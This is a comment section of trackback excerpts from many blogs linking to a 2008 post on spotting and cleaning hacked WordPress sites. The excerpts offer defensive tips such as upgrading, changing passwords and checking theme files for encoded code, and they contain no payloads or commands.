[...] you upgrade your blog immediately when a new version is released, your site might already have been hacked. Therefore, if there are known WordPress vulnerabilities, old or otherwise, your blog is [...]
[...] (June 10): Check out this very helpful post by Donncha O [...]
[...] are taken to remove it. Donncha, one of the WP devs, attempts to allay everyone’s fears with this post explaining how to spot a hack and a few common sense tips on how to keep your WordPress site [...]
[...] Did your WordPress site get hacked? Did your WordPress site get hacked? (tags: wordpress security blogs hacking tutorials) [...]
[...] Did your WordPress site get hacked? :: Holy Shmoly – a really good overview of Wordpress blogs being hacked with some tips to help you combat any damaging effects. [...]
[...] on 2.5.0 or less, you should really upgrade. (hopefully bold pink writing will get your attention) Did your WordPress site get hacked? __________________ my sites :irish poker / irish jobs / seo faq / advertise jobs free / green [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] your WordPress site get hacked? June 11, 2008 — htaccess Did your WordPress site get hacked? Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember [...]
[...] If you want to be sure that those attackers responsible for such Wordpress exploit haven’t gotten inside your Wordpress blog, immediately check for the guides posted here. [...]
[...] is a reprint of an article by Donncha O Caoimh, the WordPress Guru. Remember a few weeks ago there was all that noise about WordPress blogs [...]
[...] may not tip off the blog owner in any way. The security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening. If you are currently not running [...]
[...] But if you managed to find this article first, please (PLEASE!!!) head over to their blog and read the full article on how to protect your site from the [...]
[...] gives WordPress users a reminder to upgrade our WordPress blogs in light of possible security risks. Donncha know you have to upgrade WP!? Okay, bad pun. At any [...]
[...] and the methods used by hackers, as well as ways of recognising and removing the threat, are covered in great detail by Donncha O Caoimh; a link to her article is also still available on the administrator dashboard [...]
[...] More to read, Source: here [...]
[...] Did your Wordpress get hacked? [...]
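[...] that was six months ago. But in May the same thing happened again. This time the cause was a different, new security hole, and this too happened a few days before Wordpress could address it with an update. The problem is that most blog owners are unaware of the threat of hackers targeting blogs, because the attacks may come without any warning to the blog owner. The security vulnerabilities in Wordpress have led to automated attacks on a very large number of blogs. Sometimes the site owners do not realize what is happening. [...]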
[...] more information on the code snippets used by hackers you can check detailed blogs dealing with the issue. In the meantime keep on [...]
[...] Did your WordPress site get hacked? Mine didn't, I think… [...]
[...] security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting about a Wordpress hack that will “steal” your search engine traffic . As [...]
[...] Did your WordPress site get hacked? 2. Make Money Online: 100+ Tools and Resources 3. Win Friends and Clients for Joint Ventures – [...]
[...] likely your site has been taken over by hackers. To find out whether your blog is still safe, follow the instructions on this site. Because of its popularity as a blogging platform, WordPress has become a prime target for hackers [...]
[...] Holy Shmoly shows you what to do if your blog gets “hacked”… Always interesting, and definitely one to bookmark! [...]
[...] all files in the WordPress theme you use, since these are not upgraded. This is usually where hidden code gets inserted, mainly with the commands eval() and base64_decode(). Look for code that looks [...]
[...] This week a public exploit was discovered that could make your blog redirect to another site if clicked on via search engines. The hack places a piece of code in your header file and enables another site to take control of where visitors get redirected to based on their preference. You can make sure your blog hasn’t already been compromised by checking your header file for this code. [...]
[...] update them. I learned about this through Chris Jacobson, who linked to another blog called Holy Shmoly that not only talked about blogs getting hacked, but broke it down to explain [...]
[...] 16. Eumaeus, or Why are there so few Academic Bloggers? In the Odyssey, Odysseus returns home to find his home besieged, which, reunited with Telemachus, he plots to free; in Ulysses, Bloom and Stephen walk from Nighttown to a Cabman’s shelter west of the Custom House where they drink coffee and chat with a sailor, and Bloom expostulates to a prostitute on the perils of vice. (Yet again, consider Beijing, Chapter 14). It is no exaggeration to say that Ulysses has spawned an entire academic industry that is showing every sign of redoubling, but very little of it is in blogs. Yet, Crooked Timber has been continually surprised over the years about how many academics fail to take advantage of the Web as a medium for disseminating their work, and later gives sound advice to a PhD student wondering whether to embark on a blog; of course, one of the keys is to choose a good domain name, especially when they are increasingly scarce. Damien Mulley has good advice for all such bloggers on beating procrastination and writers block; and Holy Shmoly! (Donncha O Caoimh) has good advice on beating Wordpress hackers. [...]
[...] week ago I suggested installing AIDE to track changes on your server in case it had been hacked. I think AIDE Is so [...]
[...] hacker. To find out whether your blog is still safe, you may need to follow the discussion HERE. Because the wordpress blogging platform is the most popular, and is run for SEO purposes, traffic [...]
[...] Did your WordPress site get hacked? – More info about the structure of the Wordpress attacks and how to prevent them, written by one of the Wordpress people. [...]
[...] advise you to go to Holy Schmoly, who has written a very thorough post on the subject (in English, unfortunately). In it she talks about the [...]
[...] If you use wordpress make sure you upgrade the version. I snoozed and my site is toasted. I hate the [...]
[...] WP site hacked? Holy Shmoley knows what to do [...]
[...] famous Donncha describes several of them in the post Did Your WordPress Site Get Hacked?, along with the solutions for each [...]
[...] Did your WordPress site get hacked? Do you know what to do in such a case? Read and learn from Did your WordPress site get hacked? [...]
[...] you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time…..(click to read more) If those quoted excerpts are not sufficient, Mr/Ms. WordPress Blogger, please do yourself a [...]
[...] my theme. Frustrated, I went to some of my friends on the WordPress team, and they pointed me at a great article from Donncha O Caoimh: Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known [...]
[...] I can’t believe my shit got hacked. I thought that only happened in the movies or to big corpo types. I thought some thing might go [...]
[...] Donncha O Caoimh posted a 6/8/2008 note about detecting whether your WP blog has been hacked, and some steps on dealing with it. [...]
[...] me however is one of the comments that i read at his website that points me to this other website, holy shmoly!, specifically, how secured is our wordpress?. Apparently there are some security flaws on previous [...]
[...] info here and here. On this site it took the form of links added into the template files, and with a display: [...]
[...] blogs running older versions of WordPress were hacked. Peter offers a way to have your site notify you when things are [...]
[...] previous post about hacked WordPress sites caused Donnacha to ask, After your last post on this subject, I was thinking that it would be a [...]
[...] old versions of the Wordpress script are vulnerable to various hacker attacks, Donncha published an article on the same topic few days back. Today he has released a plugin called Wordpress Exploit Scanner, [...]
[...] couple of weeks ago an article about hacked Wordpress sites came up in my Wordpress admin dashboard. I hadn’t been paying attention to all of the noise [...]
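[...] Since the release of WordPress 2.5, discussions about WordPress security have appeared frequently on the WordPress development blog and forums: 1, 2. The hackers discussed there usually leave back-end programs on the blog, or other hidden malicious links and the like. WordPress Exploit Scanner is meant precisely for scanning whether hackers have left these evil things in WordPress. Of course, some hackers like to delete things, and then there is nothing to be done. [...]
[...] on blogs that use WordPress, which left quite a few of these blogs inactive; Donncha O Caoimh gave a series of steps for finding out whether your blog had been attacked. Now he has just [...]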
[...] website WSOS). It appears that hackers gained access to numerous out-of-date wordpress blogs (details and fixes here) and used wordpress to send many, many spam [...]
[...] Changes Notifications for Your Wordpress Blog on Linux Did your WordPress site get hacked? Three tips to protect your WordPress installation 10 Ways to Secure your Wordpress Install [...]
[...] I had been rather diligent in updating software but fell into a lull after 2.0.3 of WordPress. I rarely, if ever, check my stats so I’m not sure how long it has been happening, but something got hacked. If you run WordPress, check your stats and then go here. [...]
[...] on the site (it never was required) and did everything that the article I linked to yesterday from Holy Schmoly recommended. The hardest thing was to change the database table prefixes and while I found a script [...]
[...] also has a good technical analysis of the exploit in his post – Did your WordPress site get hacked? And JD posted how to manually get rid of the hacks – Patching the WordPress AnyResults.Net [...]
[...] upgraded the site to the latest version of WordPress. Unfortunately there was a vulnerability in the older version I was using which led to it being hacked by a bot. About 100k of links to a dodgy pharmacy site had [...]
[...] Did your WordPress site get hacked? deals with the latest exploit of the WordPress and how to fix it. [...]
[...] WordPress blogs are starting to get hacked in greater numbers lately. The problem is getting serious enough that the WordPress podcast recently addressed out of [...]
[...] had to find out. A pretty good guide to the right way to proceed can be found, for example, at Holy Shmoly!. by BloggingTom, filed under Blogging [...]
[...] I of course recommend my rescuer BloggingTom (many thanks at this point) and Holy Shmoly (English guide to fixing [...]
[...] on how to solve it and my head is about to burst. Lucky this site explains things clearer – Is your Wordpress hacked? They’re also uploading PHP code disguised as jpeg files to your upload directory and adding [...]
[...] code was placed in my theme’s header file, base64 encoded just as the article said it would [...]
[...] Did Your WordPress Site get Hacked? [...]
[...] the link given by Genkisan, I found this useful tutorial on ‘Did your Wordpress site get hacked?‘ They’re also uploading PHP code disguised as jpeg files to your upload directory and [...]
[...] If you noticed the site looking funny Sunday morning, it’s because I was reinstalling the blog software that I use, which is called WordPress. Some time in the last month or two this blog was hacked, through a vulnerability in WordPress that is described here. [...]
[...] where my blog is hacked by unknown attacker or two, I become a little bit paranoid. Thanks to Holy Shmoly, there is somewhat a definite guide on how to ‘harden’ your wordpress [...]
[...] Nik Cubrilovic wrote on TechCrunch about how a blog of his was hacked in June. He offers some interesting observations. For practical, WordPress-specific advice, there are a bunch of tips here and Donncha O Caoimh offers a technically-minded look at some of the issues. [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] Doncha’s excellent (and more recent) write-up of how to deal with a hacked WordPress installat… [...]
[...] One of the Wordpress developers posts: Did your WordPress site get hacked? [...]
[...] links from Kulpreet include WordPress Security White Paper, and “Did your WordPress site get hacked?” featuring samples of what a hacked site would look like. [...]
[...] Did Your Wordpress site Get Hacked? >> Holy Shmoly! [...]
[...] Scanner 0.1 has been released, in response to a comment on a recent thread about old versions of WordPress sites being hacked. You may have spotted this in your WordPress dashboard. Problem is, it only works for v2.5.1+, so [...]
[...] That seemed very far-fetched to me, but it was true. A hacker has found an exploit in Wordpress and is now gratefully making use of it. What happens is that an (invisible) comment is added to the text of a link in a blog post. When you then read the blog post, the browser tries to follow the link. The link points to a nasty site somewhere in China, through which the reader could in theory get a virus (Trojan Horse). More information about the “exploit” can be found on the Wordpress site. More information (including a script with which you can check the Wordpress installation for exploits and hacks) can be found on this site. [...]
[...] {from bloggerguide.net} {from ocaoimh.ie} [...]
[...] will make it less likely. If you ever find yourself in the same situation as me check out this post. I found it very [...]
[...] read about this and took steps to recover my blog. The old theme is the culprit. I got rid of it and am upgrading [...]
[...] the most helpful article was Did Your Site Get Hacked. Why, yes it did. You might also consult Wordpress Security [...]
[...] suspect that this site was hacked by bots. I think that the culprit is an old plugin I never updated. That, and the security was [...]
[...] links A blog post about securing your wordpress blog How to upgrade your wordpress [...]
[...] post that tells you how to know if your Wordpress blog has been hacked, and what to do about it: Holy Shmoly!. GREAT POST! Bookmark [...]
[...] my site had been hacked and had a stream of links to Anti-Virus sites above the top header. After a quick Google it turned out to be an easy fix, but it reminded me of my former days of scanning code for a [...]
[...] Vancouver Techie blogger Jan Karlsberg also has some advice for Wordpress bloggers (and companies running their websites off the Wordpress platform) to protect themselves with a little code review. He knows, because his Wordpress blog got hacked – and he fixed it. Some other Wordpress anti-hack tips here. [...]
[...] Most of the fixes are well beyond the scope of this blog. However, if you are mysql and php literate, you may want to start with this post at the wordpress.org forums and read Doncha’s post on Did Your Wordpress Site Get Hacked? [...]
[...] Did your WordPress site get hacked? – Donncha [...]
[...] Did your WordPress site get hacked? [...]
[...] Donncha (one of the original Wordpress founders, remember that name in your first blogroll?) for catching an insidious trick that’s inherent in some Wordpress templates. Irrelevant links on your site can drain off your [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Holy Shmoly: Did Your Website Get Hacked? [...]
[...] found an article by Donncha, Did your WordPress site get hacked?. Fcuking A for [...]
[...] Did your Wordpress site get hacked? Malicious script injection on my [...]
[...] 1) reset your admin password by following the instructions above 2) immediately upgrade to the newest version of Wordpress 3) backup the database used for your blog. (usually you do this when upgrading, but if you’re a frequent blogger, backup more frequently.) 3) create a new password that isn’t easy to break. include odd characters like ! +))^& and throw in an occasional upper case letter along with numbers. 4) check out the excellent suggestions at http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]
[...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]
[...] for blog, ftp and database. To other WordPress bloggers I would recommend taking a look at this post. (Thanks to Kristin for the link via [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] such as here or here. Or there is another, more complete tutorial for a somewhat different case here, or a reference from the ShoeMoney blog with an almost similar case here, and others of course at [...]
[...] those of you who want more: Read an interesting article about a Wordpress blog being [...]
[...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Click here to read post [...]
[...] you threatened? Visit Holy Shmoly! for more [...]
[...] Update 17-03-09: All the problems have been fixed. In the end it was NOT a Wordpress flaw; rather, another of the people who share the server with us installed some kind of application of dubious security, and very probably that allowed the server to be accessed and malicious code to be added to many of the php files of my Wordpress installation. The solution to all this was given to me in the thread I opened on the Wordpress technical support forum, so I am leaving the link here for anyone it may help if they have suffered this same attack. Specifically, the site that provides the solutions is: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] BlogSecurity is a blog that provides information about maintaining Wordpress Security. Holy Shmoly has a great blog post entitled “Did your Wordpress Blog Get Hacked?” and it provides a [...]
[...] my sites: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” and “Did your WordPress site get hacked?”, rather [...]
[...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]
[...] First, download the latest version of wordpress and replace the system files with the new ones. Then clean the malicious code out of the files added afterwards (such as themes and plugins). Change all your passwords, starting with the one most closely related to your website. Learn to generate good, usable passwords. This is a bit ironic, but keep your windows secure. Fortunately I am not the only one this has happened to. If you are facing this situation too, you can make use of the links below: http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] be on your blog, you can go through this list. If you want to know how a hacker works, this page is quite good to read, though very [...]
[...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tackles hacked php scripts on WordPress and how they look [...]
[...] Open source Exploits The open source platforms are now an easy target for hackers to exploit and use the malicious codes. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] spam. I am not sure I cleaned everything I had to clean. But I did what I could. Here is more information for checking whether you have the same problem. (Not you, Javi, I already confirmed that you did not have the same [...]
[...] Did your WordPress site get hacked? [...]
[...] Well, it was clearly bad news: the site ajaxplorer.info was hacked on the 13 July 2009, naturally just the night before an important gig, so I had to put it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server, but it was a wordpress security problem. My fault, I had not updated the wordpress install, and I will right now subscribe to the wordpress rss feed urging to upgrade when they find a problem. For those using wordpress, have a look here if you haven’t updated already: http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] Did your WordPress site get hacked? [...]
[...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]
[...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]
[...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]
[...] Did your Wordpress site get hacked? [...]
[...] advice: Holy Shmoly! and My Digital [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] How To Completely Clear Your Hacked WordPress Installation Hardening WordPress Did Your WordPress Site Get Hacked? 20 WordPress Security Plugins (don’t overdo it, though) [...]
[...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. Wordpress, php hack, php, security, [...]
[...] went to Wordpress support for suggestions, and found a few helpful links (Lorelle)(Donncha) I learned from Lorelle - btw, everyone who uses wordpress should know Lorelle!- that [...]
[...] Holy Shmoly recommends keeping updated to the latest version of wordpress to protect against hackers. In addition to that, you should also change your passwords, remove any other users, change your wordpress config “secret key” and delete any malicious codes left by the hacker which may allow them to get in again in future. If you’re like me and have no idea how to find malicious scripts, Holy Shmoly also explains how you can identify and remove them. [...]
[...] Did your WordPress site get hacked? [...]
[...] as well go all the way and have longer (and more complicated) passwords created. Good References http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://enthusiasm.cozy.org/archives/2010/01/argh-blog-hacked [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://forum.kaspersky.com/lofiversion/index.php/t104035.html [...]
[...] Did your Wordpress Site get hacked is a good pointer to fixing things. It is pretty insidious what can happen: [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]